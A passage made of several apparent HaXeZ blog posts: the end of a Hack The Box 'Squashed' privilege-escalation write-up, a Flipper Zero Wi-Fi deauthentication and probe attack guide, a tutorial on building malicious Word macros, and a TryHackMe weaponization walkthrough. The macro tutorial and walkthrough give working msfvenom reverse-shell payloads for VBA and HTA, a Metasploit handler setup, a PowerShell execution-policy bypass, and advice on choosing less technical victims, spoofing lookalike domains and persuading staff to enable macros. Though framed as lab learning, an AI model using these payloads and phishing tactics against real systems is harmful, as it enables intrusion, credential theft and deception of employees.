In order to elevate privileges on Squashed, I mounted the ross NFS export. Next, I created a user with the same user ID as ross, switched to it, and started looking around.

┌─[[email protected]]─[~]
└──╼ $sudo mount -t nfs 10.129.228.109:/home/ross /mnt/ross

┌─[[email protected]]─[~]
└──╼ $ls -laSH /mnt
total 13
dr-xr-xr-x  1 root root     4192 Mar  9 10:11 hgfs
drwxr-xr-x 14 1001 scanner  4096 Mar  9 09:19 ross
drwxr-xr--  5 htbs www-data 4096 Mar  9 10:10 www
drwxr-xr-x  1 root root      262 Mar  8 09:31 ..
drwxr-xr-x  1 root root       22 Mar  9 09:35 .

┌─[[email protected]]─[~]
└──╼ $sudo useradd htbross

┌─[[email protected]]─[~]
└──╼ $sudo usermod -u 1001 htbross

┌─[[email protected]]─[~]
└──╼ $sudo su htbross

$ ls -laSh /mnt/ross
total 64K
drwxr-xr-x 14 htbross scanner 4.0K Mar  9 09:19 .
drwx------ 11 htbross scanner 4.0K Oct 21 15:57 .cache
drwx------ 12 htbross scanner 4.0K Oct 21 15:57 .config
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Desktop
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Documents
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Downloads
drwx------  3 htbross scanner 4.0K Oct 21 15:57 .gnupg
drwx------  3 htbross scanner 4.0K Oct 21 15:57 .local
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Music
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Pictures
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Public
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Templates
drwxr-xr-x  2 htbross scanner 4.0K Oct 21 15:57 Videos
-rw-------  1 htbross scanner 2.5K Mar  9 09:19 .xsession-errors
-rw-------  1 htbross scanner 2.5K Dec 27 15:33 .xsession-errors.old
-rw-------  1 htbross scanner   57 Mar  9 09:19 .Xauthority
drwxr-xr-x  1 root    root      22 Mar  9 09:35 ..
lrwxrwxrwx  1 root    root       9 Oct 20 14:24 .bash_history -> /dev/null
lrwxrwxrwx  1 root    root       9 Oct 21 14:07 .viminfo -> /dev/null

At this point, I had no idea what I was looking for. Normally, I would just drop an SSH key in the authorized_keys file and SSH to the box. However, that wasn’t the way this box was intended to be completed. I resorted to looking at the official walkthrough and now the Xauthority file is a dead giveaway. You can look up what the file is for and what the presence of it suggests but to keep this short, it stores session tokens for X sessions. We can steal the token and use it to snoop on ross.

Cat the contents of the file and base64 encode it so it isn’t jibberish. Then save the output into the /tmp directory of Squashed via your reverse shell as alex.

$ cat /mnt/ross/.Xauthority
squashed.htb0MIT-MAGIC-COOKIE-1��Ȃ���).S��P���$ 

cat /mnt/ross/.Xauthority | base64
AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCVh8iC8NLjKS5TkZBQgIyC

$ echo AQAADHNxdWFzaGVkLmh0YgABMAASTUlULU1BR0lDLUNPT0tJRS0xABCVh8iC8NLjKS5TkZBQgIyC | base64 -d > /tmp/.Xauthority
Xauth
Xauth

Then, as alex we can do some more enumeration and find out what the configuration of ross’s session is. You can just press w apparently and it will show you. Had no idea. The more you know.

[email protected]:/tmp$ w
w
10:26:43 up  1:07,  1 user,  load average: 0.02, 0.02, 0.00
USER     TTY      FROM             [email protected]   IDLE   JCPU   PCPU WHAT
ross     tty7     :0               09:19    1:07m  9.11s  0.05s /usr/libexec/gnome-session-binary --systemd --session=gnome

Now, this allows us to start taking screenshots of the desktop with the following command… cool.

xwd -root -screen -silent -display :0 > /tmp/screen.xwd

Then, in order to access the screenshot we spin up a python web server and navigate to it and download it.

[email protected]:/tmp$ python3 -m http.server
python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.126 - - [09/Mar/2023 10:33:30] "GET / HTTP/1.1" 200 -
10.10.14.126 - - [09/Mar/2023 10:33:30] code 404, message File not found
10.10.14.126 - - [09/Mar/2023 10:33:30] "GET /favicon.ico HTTP/1.1" 404 -
10.10.14.126 - - [09/Mar/2023 10:33:58] "GET /screen.xwd HTTP/1.1" 200 -

Open the image, mine defaulted to gimp. I love gimp so no complaints. It looks like it is a password manager showing the root password.

Password Manager root
Password Manager root

Squashed root Flag

With the password for root we can simply switch to the root user and capture the root flag from the root directory. That completes the box.

$ su root
Password: cahxxxxxxxi9A
whoami
root
cat /root/root.txt
692xxxxxxxxxxxxxxxxb159c

Conclusion

This was a fun box with an interesting privilege escalation technique. The method of completing it was fairly easy in terms of ability provided you understand the files you see. LinEnum didn’t flag the file as a method for privilege escalation so I wouldn’t have had a clue without the walkthrough. The great thing about Hack The Box machines is that everyone teaches you something new.

Marauding Wi-Fi Networks With The Flipper Zero

Hello world and welcome to Haxez, today I’m going to be talking about using your Flipper Zero to attack Wi-Fi networks. By default, the Flipper Zero doesn’t have Wi-Fi capabilities. However, with the addition of the Wi-Fi developer board, you can add this functionality. The Wi-Fi developer board is rocking an ESP32-S2 module. With this module, you can perform Wi-Fi penetration testing such as probing attacks, de-authentication attacks, SSID rickrolling, and more.

lipper Zero Wi-Fi developer board
Flipper Zero Wi-Fi developer board

Installing Marauder to the Wi-Fi Development Board

The Wi-Fi developer board can be purchased from the Flipper Zero website for $29.00. Obviously, As I’m in the UK I purchased mine from Joom for £36.60 excluding VAT and shipping (Ouch). As mentioned previously, the board adds Wi-Fi functionality to the Flipper Zero but you need to do a bit of work beforehand.

First, you need to download the Marauder firmware and flash it to the developer board. I would recommend using the UberGuidoZ Flipper repository to make the process easier. Unzip the zip archive and locate the flash.bat file. Then, while holding down the boot button, connect the Wi-Fi development board to your computer via USB and hold the boot button down for 3 seconds.

Booting the Wi-Fi Development Board
Booting the Wi-Fi Development Board

Your computer should recognize the device. Now, double-click the batch file. You may get a Windows security alert, if that is the case click show more and then run anyway. This should spawn a command prompt window similar to the one below. Furthermore, it should have a number of options including the ability to flash the Marauder firmware. Select option 1 and wait patiently for it to install.

Installing Marauder firmware
Installing Marauder firmware

Adding Wi-Fi Functionality To The Flipper Zero

Unfortunately, Flipper Zero doesn’t have the functionality to use the Marauder Firmware out of the box. However, you can install some custom firmware that contains the Marauder tools in order to use it. Although, That is going to be outside the scope of this post but feel free to click the image below to read my article on installing the RogueMaster firmware. Once you’ve read that, come back here and finish the article.

Making Flipper Zero Ultra with RogueMaster Firmware
Making Flipper Zero Ultra with RogueMaster Firmware

Marauder Menu

Now that you have Maurader and RogueMaster installed, you should have access to the Marauder menu on your Flipper Zero. In order to access it, head to Applications > GPIO > [ESP32 WiFi Marauder]. After selecting Marauder you should have a number of options including View Log from, Scap AP, SSID, List, Select, Clear List, Attack, Beacon Spam, Sniff, Sniff PMKID on channel, Channel, Settings, Update, Reboot, and Help. Some of these options have sub-options that can be accessed by pressing left or right on your Flipper.

Marauder Wi-Fi Menu
Marauder Wi-Fi Menu

Scanning Access Points

One of the first options in Marauder is Scan AP. This option lets you scan for access points within your nearby area. Furthermore, the results of these scans can be used with other attacks such as de-authentication and probe attacks. The image below shows that I have started a scan for local access points. The results will be displayed below and saved to the AP list.

Scanning For Wi-Fi Access Points
Scanning For Wi-Fi Access Points

Listing Access Points

The next option in the list is to list the access points that you have just scanned. This is a convenient feature as it assigns a number to each of the access points. This number can be used later to select the access point you want to attack. The image below shows the results of running the list command after running the Scan AP command. As you can see, it shows 5 access points (0 to 5). However, the list can be scrolled on indefinitely depending on the number of access points.

List of Wi-Fi access points
List of Wi-Fi access points

Selecting An Access Point

The select option allows you to select an access point based on the list. At least, that’s what I hope it is doing. Regardless, the option presents a keyboard that allows you to type in the access point you want to select. Once selected, you can then launch attacks against the selected access point.

Selecting An Access Point
Selecting An Access Point

Rick Roll Attack

The first attack that I’m going to talk about is the Rick Roll attack. That’s right, you can rickroll people but not in the conventional sense of sending them the Youtube URL. This attack is mostly harmless but is a cool party trick. By selecting the Rick Roll attack method, you send data out from the Flipper Wi-Fi board and create a bunch of dummy access points named in accordance with the lyrics from the song. As you can see from the image below, I have launched the attack and there are a number of new access points available.

Wi-Fi Rick Roll Attack
Wi-Fi Rick Roll Attack

Wi-Fi De-Authentication Attack

The next attack I want to talk about is the Wi-Fi de-authentication attack. This attack can be useful when trying to capture handshakes. Wireless handshakes will contain the hashed password for the access point. Capturing the hash would allow you to crack it and then access the access point. The de-authentication attack works by sending de-authentication frames to the wireless access point. This packet is usually spoofed from the client and forces them to disconnect.

Wi-Fi De-Authentication Attack
Wi-Fi De-Authentication Attack

Probe Attack

Probes are sent out by devices when not connected to a wireless access point. They send probes for access points that they have previously connected to in order to see if the access point responds. A probe attack is essentially spamming probe requests to the select access point. I believe the desired output of this attack is to confuse the access point and potentially consume resources leading to a denial of service conditions. Don’t quote me on that though as I’m not 100% sure and am just going off of the articles I’ve read so far. I will update this if I get any more insight into the purpose of this attack.

Wi-Fi Probe Attack
Wi-Fi Probe Attack

Sniffing

The Wi-Fi developer board with Marauder also has a number of sniffing options including sniffing de-authentication packets, pwnagatchi packets, beacon packets, esp packets, and pmkid packets. I haven’t played with the sniffing options too much but it doesn’t seem like you can run both attack payloads and sniffing payloads at the same time. I will look into these options further at a later date.

Sniffing
Sniffing

Conclusions

There is a lot more to the Marauder firmware than I’ve covered in this post. it has the ability to sniff packets and other things that I haven’t explored yet. However, I wanted to make a post about it as there aren’t many posts about it. Hopefully, this should get you up and running with the Marauder firmware and more people will make content about it. Anyway, the firmware and Wi-Fi development board are excellent additions to the Flipper Zero if you’re looking to increase its functionality. I can’t wait to see what other things people make.

Making Malicious Microsoft Office Files For Hacking

Hello world and welcome to HaXeZ, in this post I’m going to be explaining how you can hack anyone with a Microsoft Office Document. Ok, nothing is ever going to work 100% of the time. I was going through the Red Team Weaponization room on TryHackMe and I loved this technique so much that I wanted to make a separate post on it.

Microsoft Office Visual Basic

Microsoft Office applications have a feature that allows them to support Visual Basic programs or macros. Furthermore, these macros can be used to automate manual tasks to make the user’s life easier. However, we will be using these programs for something far more nefarious. In order to get started we need to create a new Word document. Once you have the document open, navigate to the view tab and click on Macros, then view Macros.

Microsoft Office Visual Basic
Microsoft Office Visual Basic

Creating A Macro In Microsoft Office

With the Macro window open, give your new sinister macro a name as shown in the screenshot below. You also need to ensure that the current document is selected from the dropdown menu. Once you have made those changes, click create.

Creating A Macro In Microsoft Office
Creating A Macro In Microsoft Office

A new window should pop up with the title Microsoft Visual Basic for Applications. Within this window should be your Document1 macro editor. For our first macro, all we’re going to do is have the document spawn a dialog box with a message. This can be achieved with the snippet of code below.

Sub THM()
  MsgBox ("YOU HAS BEEN HAXED!!!")
End Sub
Visual Basic Script
Visual Basic Script

Running the Microsoft Office Macro

Next, we need to test that the Macro works. This can be done by simply clicking the green triangle icon within the macro window. This will execute the Visual Basic code which should create the message box. Fantastic, you have created your first macro. However, this doesn’t really accomplish anything as the user would have to open the macros themselves in order to run it.

Running the Macro
Running the Macro

Automatic Macro Execution (sort of)

We can configure the macro to automatically execute when the document is opened (sort of). The user will still need to enable macros but once they have, the macro will execute. This can be done by editing the macro and adding the Document_Open and Auto_Open functions. You also need to specify which function to execute, in our case it is the EvilMacro function. The code will look similar to the snippet below.

Sub Document_Open()
  EvilMacro
End Sub

Sub AutoOpen()
  EvilMacro
End Sub

Sub EvilMacro()
   MsgBox ("YOU HAS BEEN HAXED!!!")
End Sub
Automatic Macro Execution (sort of)
Automatic Macro Execution (sort of)

In order for the macro to work, it needs to be saved in a Macro-Enabled format such as .doc and docm. To do this, save the document as a Word 97-2003 Template. Got to File, save Document1 and save as type Word 97-2003 Document and finally, save. Now if you close the document and reopen it, you may get a warning message saying that macros need to be enabled. Click enable and the macro will run.

Popping Programs with Microsoft Office

That’s great and all but it doesn’t really do anything other than tell the user you hacked them. However, we can expand the functionality to do other things like launching programs. A standard proof of concept in penetration testing is showing that you had the ability to launch the calculator. This can be done by declaring a payload variable as a string using the Dim keyword. Then we specify calc.exe as the payload. Lastly, we create a Windows Scripting Host object to execute the payload. The script should look like the snippet below. Follow the same steps as before to save and close the document, then opening the document again should open the calculator.

Sub Document_Open()
  EvilMacro
End Sub

Sub AutoOpen()
  EvilMacro
End Sub

Sub EvilMacro()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub
Popping Programs in Microsoft Office
Popping Programs

Injecting Some Venom

With the proof of concept out the way, it’s time to apply it to a real-world scenario. Microsoft Office Visual Basic Applications can be used to create reverse shells back to your attack box. For the purposes of this article, I will be using the TryHackMe labs as I couldn’t get it to work on my own Windows 10 lab. I did tinker with it for a few hours but was unsuccessful. The TryHackMe lab does have Windows Defender turned off.

Firstly, we need to create a Macro payload to add to our Microsoft Word Document, this can be done using the following msfvenom command and replacing the X’s with your attack boxes IP address and desired port:

msfvenom -p windows/meterpreter/reverse_tcp LHOST=X.X.X.X LPORT=X -f vba

Once the payload has been generated, you need to add it as a new macro to your Office Word document. You also need to change the last line from Workbook_Open() to Document_Open() unless you’re working with Excel documents. Then, save the document as a Word 97-2003 Document.

Injecting Some Venom in to Microsoft Office
Injecting Some Venom

Catching The Reverse Shell

The last step of the exploit is to capture the reverse shell once the document has been opened. In order to do this, we’re going to use Metasploit’s multi-handler. This can be done by typing use exploit/multi/handler. We’re then going to set the payload of windows/meterpreter/reverse_tcp. Finally, we’re going to set the LHOST and LPORT to the same values that we used in the msfvenom payload.

Catching The Reverse Shell
Catching The Reverse Shell
Exploit Complete
Exploit Complete

Triggering The Payload

When the victim opens the document, they will be greeted with a warning message that macros have been disabled. However, if you are using email as your delivery method then you can explain to the victim that it is important for them to enable macros. The victim then enables the macro, the payload executes and the reverse shell connects back to your attack box. You should now have a meterpreter shell on the victim’s machine.

Triggering The Microsoft Office Payload
Triggering The Microsoft Office Payload

Microsoft Office Delivery Methods

The are a number of different delivery methods that you can use to get the document into the hands of your victim. It is important to choose your victim appropriately when trying to compromise your target. For example, if you sent your payload to the head of the security team then your chances of success will likely be low. However, if you chose someone in the finance or sales department, someone with less IT security knowledge but who may still have a high level of access, then your success rate could be higher.

USB Delivery

USB delivery can be a powerful delivery mechanism to get malware onto a victim’s computer. Curiosity killed the cat and in this case, could compromise a network. If you were to load a USB device with the document and then label the document with something like “confidential” or “important”, I bet someone would want to take a peek at the contents.

Web Delivery

Web delivery is a convenient way to serve the malicious document to an unsuspecting victim. You could send the URL to the victim in an email, SMS, or other messaging technology. It also has the benefit of being more dynamic in that you can host multiple different payloads and make modifications to them. The USB delivery technique is a one-and-done but web delivery gives you more flexibility. The victim need only down the file and open it.

Email Delivery

Email delivery is a great option for a delivery technique provided the document doesn’t get flagged by antivirus. Furthermore, emails can be spoofed or you can register domain names similar to the victim’s domain so that the email seems more legitimate. For explain, if you had a victim with the email address [email protected] then you could register mydoma1n.com and send them an email from [email protected] Granted it stands out but there are more sneaky ways to do this. You can use alt codes and characters from different alphabets to make it stand out less.

Furthermore, you could add context to the email. You could flag the email as important and explain to the user that they need to enable macros. If this email was then sent to a less technical employee and seemingly came from the IT department then it would increase the chances of compromise. This method exploits the trust the user has for the domain. It could be considered a social engineering attack.

Conclusion

Ok, the title of this post was clickbait and for that, I apologize. Granted the content of this post isn’t going to allow you to hack anyone with an Office document. The victim’s environment would have to be configured in such as way as to not detect the payload. Furthermore, you would have to trick them into running macros through some social engineering attack. However, there are many organizations out there that run outdated operating systems and versions of Microsoft Office. This attack could potentially work on outdated systems which is why you should keep your software up to date. Anyway, I had a fun but frustrating time trying to get this to work. I hope you enjoyed it.

Red Team: Initial Access – Weaponization | Try Hack Me

Hello world and welcome to HaXeZ, in this post I’m going to be going through the Weaponization room on TryHackMe. Until now, the rooms haven’t been that hands-on. However, this room steps it up a bit and has us create payloads for exploiting machines. Consequently, i’m going to try and reduce the reproduction of the content that THM has already created and focus on working through the solutions themselves.

Weaponization Cyber Kill Chain

The introduction to the room starts by explaining where weaponization falls within the cyber kill chain. Beneath, you can see from the image below, weaponization is the second stage. The image has been taken from TryHackMe.

Weaponization Cyber Kill Chain
Weaponization Cyber Kill Chain

Furthermore, the room explains that weaponization is the part of the engagement where the Red Teamer generates payloads to exploit the target. It then goes on to explain that some organizations block or monitor the execution of .exe files but that there are alternatives such as the ones listed below.

  • The Windows Script Host (WSH)
  • An HTML Application (HTA)
  • Visual Basic Applications (VBA)
  • PowerShell (PSH)

Windows Scripting Host Weaponization

Windows Operating Systems have a built-in tool to run batch files called Windows Scripting Host. Furthermore, this scripting host tool allows for the execution of certain scripts. The room challenges us to write a script that creates a context box that says “Welcome to THM”. This can be achieved with the following code which can then be double-clicked or run from the command line.

Dim message 
message = "Welcome to THM"
MsgBox message

Next, the room challenges you to produce a script that can launch the calculator. This is fairly simple as it provides the script you need to run. However, it then asks you to produce a script to launch cmd.exe by telling you to replace calc.exe with cmd.exe. Although, it seems that this didn’t work for me. I did a bit of googling but didn’t find a solution.

Set shell = WScript.CreateObject("Wscript.Shell")
shell.Run("C:\Windows\System32\calc.exe " & WScript.ScriptFullName),0,True

HTML Application Weaponization

HTML Applications are insanely cool. They allow you to create a file and host them on a web server for an unsuspecting victim to click and run. Therefore, if an unsuspecting victim gives the application permission to run, it can grant the attacker access to their machine. For example, the snippet of code below can be hosted using the Python HTTP module and if run by a victim would open a command prompt.

<html>
<body>
<script>
	var c= 'cmd.exe'
	new ActiveXObject('WScript.Shell').Run(c);
</script>
</body>
</html>

Moreover, you can use msfvenom to create reverse shell payload HTA applications. Similarly, this can also be hosted on a web server and if run by the victim would grant the attacker access to their machine. For example, the code below can be used to create an HTA application with msfvenom.

msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.8.232.37 LPORT=443 -f hta-psh -o thm.hta

However, a far similar method of performing this type of attack is to the hta_server module in Metasploit. This module requires hardly any configuration and will automatically host the application for you. All the attacker would need to do is send the link to their victim and wait for them to run it.

Visual Basic for Application Weaponization

Visual Basic applications are another really cool way of delivering a payload. For example, Microsoft Office documents support macros which can be used to execute Visual Basic. Macros can be accessed by clicking View then macros. You then need to give the macro a name and the script to be executed. For example, the script below will run calc.exe.

Sub PoC()
	Dim payload As String
	payload = "calc.exe"
	CreateObject("Wscript.Shell").Run payload,0
End Sub
Visual Basic for Application Weaponization
Visual Basic for Application Weaponization

There is a lot more to this section which you should definitely read through but this covers the basics. This is something I will definitely be adding to my list of exploits as it is very powerful if you can trick a user into running macros.

PowerShell Weaponization

PowerShell scripts are great for compromising machines. In fact, you can use PowerShell can execute a reverse shell directly or can download externally hosted payloads and execute that to create a reverse shell. However, one problem that we may face when executing PowerShell scripts is the execution policy. This can be overridden with the simple command below.

powershell -ex bypass -File thm.ps1

Command And Control – (C2 Or C&C)

This section of the room covers information about C2’s or Command and Control. However, we have covered these in more detail in the Intro to C2 room. It is good to read through this information to reinforce what was learned in the C2 room. There are no questions to answer here.

Red Team Part 5 – Intro to C2 | TryHackMe
Red Team Part 5 – Intro to C2 | TryHackMe

Delivery Techniques

This section of the room talks about the various delivery techniques used by threat actors. It’s fairly standard in that the usual suspects are present. It discusses email delivery, web delivery, and USB delivery. There is a great episode of Mr. Robot which demonstrates the effectiveness of USB delivery. Elliot drops a bunch of Rubber Duckys outside a police station. An officer picks up one of the USBs and plugs it into their computer. While the payload was caught by the antivirus, it does demonstrate how they can be used. If you’re looking for a way to make your own USB rubber ducky then check out my guide on how to use a Digispark.

Hack Any Computer In 2 Seconds With this £2 Device | Digispark
Hack Any Computer In 2 Seconds With this £2 Device | Digispark

Practice Arena

In order to complete the practice arena, I used the hta_server Metasploit module that was mentioned previously. Furthermore, It didn’t require any configuration, all it needed was the URL that Metasploit automatically generates. Next, you paste the URL into the web application and it downloads and executes the payload. The flag can be found below. I would however strongly encourage you to do this yourself rather than copying and pasting the answer.

THM{b4dbc2f16afdfe9579030a929b799719}